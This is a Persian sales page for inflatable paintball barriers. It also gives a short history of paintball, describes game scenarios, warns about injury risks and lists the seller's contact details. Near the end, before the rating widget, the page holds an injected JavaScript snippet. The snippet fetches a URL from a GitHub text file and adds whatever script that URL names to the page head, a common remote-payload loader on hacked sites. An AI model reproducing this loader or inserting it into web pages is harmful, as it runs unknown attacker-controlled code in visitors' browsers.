مانع های پینت بال

  • همان طور که می دانید پینت بال یک تفریح هیجان انگیز و پر تحرک است که با تفنگ های بادی توب های رنگی ترکیب شده با آب است به یک دیگر شلیک می کنند.

    مانع های بادی پینت بال

    همان طور که می دانید باید مانع داشته باشد . انواع مانع زیادی برای این ورزش وجود دارد مانند لاستیک و چوبی و … اما بهریتن مانع مانع بادی می باشد. حالا الان می گوید چرا بادی؟ چون باد داخل آن را می توانید تخلیه کنید و به راحتی حمل نقل کنید. استهلاک این مانع های بادی نسبت به دیگر مانع های مثل لاستیک و چوب و … کمتر می باشد. این مانع ها در هر ابعاد اندازه ای که شما بخواید مجود می باشد. طرح رنگ این مانع ها بستگی به سفارش شما و موجودی انبار بستگی دارد. شکل های این مانع ها به صورت استوانه و مکعب و حرمی و … وجود دارد.

    بررسی تاریخچه پینت بال

    مهم‌ترین مسئله پس از پاسخ به سال پینت بال چیست این است که بازی پینت بال از کجا آمده و در آغاز چگونه بوده است. در این بخش به بررسی این مبحث می‌پردازیم.

    در ابتدای دهه  ۱۹۷۰ در وزارت کشاورزی کشور آمریکا اتومبیل‌هایی وجود داشت که در عقب آن‌ها پمپی نصب بود و به‌واسطه این پمپ رنگ‌ها به فواصل طولانی پرتاب می‌شدند و از این طریق درخت‌هایی که قرار بود قطع و یا حرص شوند علامت گذاشته می‌شدند.

    این بازی در واقع از این مسئله الهام گرفته شده است و که مدت ۱۵ سال است که به‌عنوان ورزش رسمی به کمیته المپیک نیز راه‌یافته است و از ورزش و سرگرمی پینت بال با عنوان شطرنج زنده نیز نامبرده‌اند.

    در ایران این بازی از سال ۱۳۸۰ جریان یافته و در ابتدا این بازی در مجموعه ورزشی انقلاب که فضای سرپوشیده است انجام می‌شد.

    معرفی انواع بازی پینت بال و سناریوهای مختلف

    بازی پینت بال انواع بسیار زیادی داشته و سناریو حذفی، تسخیر پرچم، ازبین‌بردن فرمانده، بیست گلوله و … از جمله شایع‌ترین انواع بازی پینت بال محسوب می‌شوند و هرکدام از این بازی‌ها هدف و قوانین خاص خود را دارند. در ادامه برخی از این سناریوها را به‌صورت مختصر برایتان معرفی می‌کنیم.

    سناریوی فتح پرچم

    هدف از این نوع بازی به‌دست‌آوردن پرچم تیم مقابل است و هر تیم موظف به برداشتم پرچم تیم مقابل است.

    سناریوی دوئل

    در این بازی خبر از تیم نیست و دو نفر تنها با دو گلوله یکی در تفنگ و دیگری در جیب بازی می‌کنند. بازیکنان از پشت به هم تکیه داده و سپس با هشدار بین ۱۰ تا ۱۵۵ قدم از هم فاصله گرفته و در لحظه به سمت هم برمی‌گردند و شلیک می‌کنند و شخصی که مورد اصابت قرار گرفت حذف می‌شود.

    سناریو کشتارگاه

    در این بازی تنها یک تیم مجهز به تفنگ و گلوله بوده و تیم مقابل تنها باید از اصابت تیر جلوگیری کرده و تا پایان مقاومت نمایند و معمولاً در دور بعدی بازی تیم مقابل مجهز به تفنگ پینت بال خواهند بود.

    سناریو فرمانده

     در این بازی هدف فرمانده بوده پوشش فرمانده متفاوت و قایل تشخیص است و برای حذف فرمانده باید تلاش شود.

    خطرات بازی پینت بال

    متأسفانه بازی پینت بال نیز مانند هر بازی دیگری دارای ریسک بوده و ممکن است آسیب‌هایی را برای بازیکنان داشته باشد. چنانچه از ماسک و کلاه استفاده نشود ممکن است موجب کوری و تز بین رفتن بینایی شود. البته در برخی مواقع افراد به دلیل عدم دقت کافی دچار شکستگی دست‌وپا براثر افتادن و برخورد با بخش‌های مختلف مکان بازی می‌شوند.

    نحوه خرید های بادی پینت بال

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره بادی طرح حلزونیی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید